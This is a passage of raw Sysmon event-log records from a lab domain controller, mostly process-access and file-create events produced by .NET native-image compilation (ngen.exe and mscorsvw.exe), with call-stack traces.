EM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006769Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.125{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45BF-6000-A802-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.125{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BF-6000-A802-000000009A01}3720C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.015{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45BF-6000-A702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.015{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45BF-6000-A702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:11.015{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45BF-6000-A702-000000009A01}4208C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.750{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C0-6000-AC02-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.734{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45C0-6000-AC02-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.734{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C0-6000-AC02-000000009A01}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.609{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C0-6000-AB02-000000009A01}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.593{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C0-6000-AB02-000000009A01}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.593{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C0-6000-AB02-000000009A01}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:12.531{08A6967A-45C0-6000-AA02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e5c-0\System.ServiceModel.Internals.dll2021-01-14 13:23:12.531 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.015{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C0-6000-AA02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.015{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C0-6000-AA02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:12.015{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C0-6000-AA02-000000009A01}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.593{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C1-6000-B002-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.593{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45C1-6000-B002-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.593{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C1-6000-B002-000000009A01}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.453{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C1-6000-AF02-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.437{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C1-6000-AF02-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.437{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C1-6000-AF02-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:13.390{08A6967A-45C1-6000-AE02-000000009A01}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13b0-0\System.ServiceModel.ServiceMoniker40.dll2021-01-14 13:23:13.390 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.343{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C1-6000-AE02-000000009A01}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.328{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C1-6000-AE02-000000009A01}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.328{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C1-6000-AE02-000000009A01}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.281{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45C1-6000-AD02-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.281{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45C1-6000-AD02-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:13.281{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45C1-6000-AD02-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\m